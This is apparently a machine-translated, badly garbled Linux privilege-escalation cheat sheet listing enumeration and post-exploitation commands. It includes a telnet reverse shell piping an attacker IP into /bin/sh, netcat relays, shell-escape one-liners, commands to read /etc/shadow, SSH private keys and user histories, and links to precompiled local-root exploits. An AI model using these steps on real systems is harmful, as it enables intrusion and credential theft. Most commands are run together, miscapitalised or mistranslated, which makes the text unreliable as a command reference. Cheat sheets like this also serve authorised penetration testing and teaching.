Before starting this article, I would like to point out that I am not an expert. As far as I know, there is no "magical" answer in this vast area. Share, share (my starting point). here is a mix of commands to do the same thing, in different places, or just a different vision to see things. I know there's more "stuff" to look for. This is just a basic rough guide. Not every command, do a good job of attention to detail.
Each action in this article is a command that may not be available on your console because it may be a command that is used in other versions of Linux.
Enumerate key points
(Linux) is the right thing to do:
Collection – enumerations, enumerations, and some more enumerations. Process – Sort by data, analyze and prioritize priorities. Search – Know what to search for and where to find the vulnerability code. Adaptive – A custom vulnerability, so it fits. The work of each system is not "fixed" for every vulnerability. Try – Prepare, test and error.
System type
What is the system version?
Cat/etc/issuecat/etc/*-releasecat/etc/lsb-releasecat/etc/redhat-release
What is the kernel version of it?
Cat/proc/version Uname-auname-mrsrpm-q KERNELDMESG | grep Linuxls/boot | grep vmlinuz
What are some of its environment variables?
Cat/etc/profilecat/etc/bashrccat ~/.bash_profilecat ~/.bashrccat ~/.bash_logoutenvset
Do you have a printer?
Lpstat-a
Applications and Services
What services are running? What kind of service has user rights?
PS Auxps-eftopcat/etc/service
Which services have root permissions? In these services you look like those with loopholes and check again!
PS aux | grep Rootps-ef | grep root
What applications are installed? What version are they? What is currently running?
ls-alh/usr/bin/ls-alh/sbin/dpkg-lrpm-qals-alh/var/cache/apt/archivesols-alh/var/cache/yum/
Service settings, are there any error configurations? Are there any (fragile) plugins?
cat/etc/syslog.confcat/etc/chttp.confcat/etc/lighttpd.confcat/etc/cups/cupsd.confcat/etc/inetd.confcat/etc/ apache2/apache2.confcat/etc/my.confcat/etc/httpd/conf/httpd.confcat/opt/lampp/etc/httpd.confls-arl/etc/| awk ' $ ~/^.*r.*/
What are the work plans on the host?
crontab-lls-alh/var/spool/cronls-al/etc/| grep cronls-al/etc/cron*cat/etc/cron*cat/etc/at.allowcat/etc/at.denycat/etc/cron.allowcat/etc/cron.denycat/etc/ Crontabcat/etc/anacrontabcat/var/spool/cron/crontabs/root
What are the plain text user names and passwords that may be on the host?
Grep-i user [Filename]grep-i Pass [filename]grep-c 5 "Password" [Filename]find. -name "*.php"-print0 | xargs-0 grep-i-N "var $password" # Joomla
Communications and networking
NIC (s), what is the system? Which network is it connected to?
/sbin/ifconfig-acat/etc/network/interfacescat/etc/sysconfig/network
What are the network configuration settings? What kind of server is there in the network? DHCP server? DNS server? Gateway?
Cat/etc/resolv.confcat/etc/sysconfig/networkcat/etc/networksiptables-lhostnamednsdomainname
Other user hosts communicating with the system?
Lsof-ilsof-i: 80grep 80/etc/servicesnetstat-antupnetstat-antpxnetstat-tulpnchkconfig--listchkconfig--list | grep 3:ONLASTW
Cache? IP and/or MAC address?
Arp-eroute/sbin/route-nee
Can packets be sniffed? What do you see? Monitor traffic
# tcpdump TCP DST [IP] [port] and TCP DST [IP] [port]tcpdump TCP DST 192.168.1.7 and TCP DST 10.2.2.222 21
How do you get a shell? How do you interact with the system?
# HTTP://LANMASTER53.COM/2011/05/7-LINUX-SHELLS-USING-BUILT-IN-TOOLS/NC-LVP 4444 # attacker. Enter (command) NC-LVP 4445 # Attacker. Output (Result) telnet [atackers IP] 44444 | /bin/sh | [Local IP] 44445 # on the target system. Using the attacker's ip!
How to port forwarding? (Port redirection)
# rinetd
# Http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
# Fpipe
# fpipe.exe-l [Local Port]-R [Remote port]-s [local port] [local ip]fpipe.exe-l 80-r 80-s 80 192.168.1.7
#ssh
# SSH-[L/R] [local port]:[remote ip]:[remote Port] [local user]@[local ip]ssh-l 8080:127.0.0.1:80 [email protected] # Local portssh-r 8080:127.0.0.1:80 [email protected] # Remote Port
#mknod
# Mknod Backpipe p; NC-L-P [remote port] < Backpipe | NC [local IP] [local port] >backpipemknod backpipe p; Nc-l-P 8080 < Backpipe | NC 10.1.1.251 >backpipe # Port Relaymknod backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow 1>backpipe # Proxy (Port 8080)
Mknod
Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | Nclocalhost 80 | Tee-a Outflow & 1>backpipe # Proxy Monitor (Port 8080)
Is it possible to build tunnels? Local, Remote Send command
ssh-d 127.0.0.1:9050-n [Username]@[ip]proxychains ifconfig
Secret Information and users
Who are you? Which ID is logged in? Who is already logged in? Who else is here? Who can do what?
idwhowlastcat/etc/passwd | cut-d: # List of Usersgrep-v-E "^#"/etc/passwd | Awk-f: & #039; $ = = 0 {print $} ' # List of Super Usersawk-f: ' ($ = = "0") {print}& #039; /ETC/PASSWD # List of Super Userscat/etc/sudoerssudo-l
What sensitive files can I find?
cat/etc/passwdcat/etc/groupcat/etc/shadowls-alh/var/mail/
What interesting files are in Home/directorie (S)? If you have permission to access
ls-ahlr/root/ls-ahlr/home/
Are there any passwords, scripts, databases, configuration files or log files? Password default path and location
Cat/var/apache2/config.inccat/var/lib/mysql/mysql/user. Mydcat/root/anaconda-ks.cfg
What have users done? Do you have any passwords? Did they edit anything?
Cat ~/.bash_historycat ~/.nano_historycat ~/.atftp_historycat ~/.mysql_historycat ~/.php_history
What kind of user information can be found
Cat ~/.bashrccat ~/.profilecat/var/mail/rootcat/var/spool/mail/root
Can private-key information be found?
Cat ~/.ssh/authorized_keyscat ~/.ssh/identity.pubcat ~/.ssh/identitycat ~/.ssh/id_rsa.pubcat ~/.ssh/id_rsacat ~/.ssh /id_dsa.pubcat ~/.ssh/id_dsacat/etc/ssh/ssh_configcat/etc/ssh/sshd_configcat/etc/ssh/ssh_host_dsa_key.pubcat/ Etc/ssh/ssh_host_dsa_keycat/etc/ssh/ssh_host_rsa_key.pubcat/etc/ssh/ssh_host_rsa_keycat/etc/ssh/ssh_host_ Key.pubcat/etc/ssh/ssh_host_key
File system
Which users can write configuration files in/etc/? Ability to reconfigure services?
ls-arl/etc/| awk ' $ ~/^.*w.*/' 2>/dev/null # anyonels-arl/etc/| awk ' $ ~/^. w/' 2>/dev/null # ownerls-arl/etc/| awk ' $ ~/^.....w/' 2>/dev/null # groupls-arl/etc/| awk '; $ ~/w.$/' 2>/dev/null # otherfind/etc/-readable-type F 2>/dev/null # any onefind/etc/-readable-type f-maxdepth 1 2>/dev/null # anyone
In/var/what can be found?
Ls-alh/var/logls-alh/var/maills-alh/var/spoolls-alh/var/spool/lpdls-alh/var/lib/pgsqlls-alh/var/lib/mysqlcat/ Var/lib/dhcp3/dhclient.leases
Any hidden configuration/files on the site? Configuration files and database information?
LS-ALHR/VAR/WWW/LS-ALHR/SRV/WWW/HTDOCS/LS-ALHR/USR/LOCAL/WWW/APACHE22/DATA/LS-ALHR/OPT/LAMPP/HTDOCS/LS-ALHR/ var/www/html/
What is in the log file? (what can help to "local file contains"?)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/cat /etc/httpd/logs/access_logcat / Etc/httpd/logs/access.logcat /etc/httpd/logs/error_logcat /etc/httpd/logs/error.logcat /var/log /apache2/access_logcat /var/log/apache2/access.logcat /var/log/apache2/error_logcat /var/log/ apache2/error.logcat /var/log/apache/access_logcat /var/log/apache/access.logcat /var/log/ Auth.logcat /var/log/chttp.logcat /var/log/cups/error_logcat /var/log/dpkg.logcat /var/log /faillogcat /var/log/httpd/access_logcat /var/log/httpd/access.logcat /var/log/httpd/error_ logcat /var/log/httpd/error.logcat /var/log/lastlogcat /var/log/lighttpd/access.logcat / var/log/lighttpd/error.logcat /var/log/lighttpd/lighttpd.access.logcat /var/log/lighttpd/ lighttpd.error.logcat /var/log/messagescat /var/log/securecat /var/log/syslogcat /var/log/ Wtmpcat /var/log/xferlogcat&nbsP;/var/log/yum.logcat /var/run/utmpcat /var/webmin/miniserv.logcat /var/www/logs/access_logcat /var/www/logs/access.logls -alh /var/lib/dhcp3/ls -alh /var/log/postgresql/ls - alh /var/log/proftpd/ls -alh /var/log/samba/#
Auth.log, boot, btmp, Daemon.log, Debug, DMESG, Kern.log, Mail.info,
Mail.log, Mail.warn, messages, Syslog, Udev, wtmp (what's the file? Log. system boot ...)
If the command is limited, what can you do to break its limits?
Python-c ' Import pty;pty.spawn ("/bin/bash") ' Echo os.system ('/bin/bash ')/bin/sh-i
How do I install the file system?
Mountdf-h
Is there a mounted file system?
Cat/etc/fstab
What is advanced Linux file permissions to use? Sticky bits, SUID, and GUIDs
Find / -perm -1000 -type d 2>/dev/null # sticky bit - only the owner of the directory or the owner of a file can delete or rename herefind / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who Started it.find / -perm -g=s -o -perm -u=s -type f 2>/dev /null # sgid or suidfor i in ' locate -r "bin$" ; do find $i &NBSP; ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done #Looks in & #039;common& #039; places: /bin, /sbin, /usr/bin, /usr/sbin,/usr/local/bin, /usr/local/sbin and any other *bin, for sgid or suid (Quicker search) #findstarting at root (/), sgidorsuid, not symbolic links, only 3folders deep, list with more detail and hideany errors (e.g. permissiondenied) find/-perm -g= s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld {} ;2>/dev/ Null
In which directories can the
be written and executed? Several "common" directories:/tmp directory,/var/tmp directory/dev/shm directory
find / -writable -type d 2>/dev/null # world-writeable foldersfind / -perm -222 -type d 2>/dev/ Null # world-writeable foldersfind / -perm -o+w -type d 2>/dev/null # world-writeable foldersfind / -perm -o+x -type d 2>/dev/null # world-executable foldersfind / ( -perm -o+w -perm -o+x ) -type d 2>/ dev/null # world-writeable & executable foldersany "Problem" files? Writable, "not used" file find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print # world-writeable filesfind /dir -xdev (&NBSP;-NOUSER&NBsp;-o -nogroup ) -print # noowner files
Prepare and find exploit code
What development tools/languages/support are installed?
Find/-name Perl*find/-name python*find/-name gcc*find/-name cc
How do I upload a file?
Find/-name Wgetfind/-name nc*find/-name netcat*find/-name tftp*find/-name FTP
Find exploit code
Http://www.exploit-db.com
Http://1337day.com
Http://www.securiteam.com
Http://www.securityfocus.com
Http://www.exploitsearch.net
http://metasploit.com/modules/
Http://securityreason.com
Http://seclists.org/fulldisclosure/
http://www.google.com
Find more information about the vulnerability
Http://www.cvedetails.com
HTTP://PACKETSTORMSECURITY.ORG/FILES/CVE/[CVE]
HTTP://CVE.MITRE.ORG/CGI-BIN/CVENAME.CGI?NAME=[CVE]]HTTP://CVE.MITRE.ORG/CGI-BIN/CVENAME.CGI?NAME=[CVE]
HTTP://WWW.VULNVIEW.COM/CVE-DETAILS.PHP?CVENAME=[CVE]]HTTP://WWW.VULNVIEW.COM/CVE-DETAILS.PHP?CVENAME=[CVE]
http://www.91ri.org/
(FAST) "common" exploit, precompiled binary code files
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
Is the information above difficult?
Go ahead and use a third-party script/tool to try it out!
How does the system hit the latest patches for the kernel, operating system, all applications, plugins and Web services?
Apt-get update && apt-get upgradeyum update
What are the minimum permissions required for the service to run?
For example, do you need to run MySQL as root?
Can I find a script that runs automatically from the following Web site?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
Http://bastille-linux.sourceforge.net
(quick) Guide and links
For example
Http://www.0daysecurity.com/penetration-testing/enumeration.html
Http://www.microloft.co.uk/hacking/hacking3.htm
Other
Http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
Http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
Http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html
Access to sensitive information methods after the most complete Linux claim in history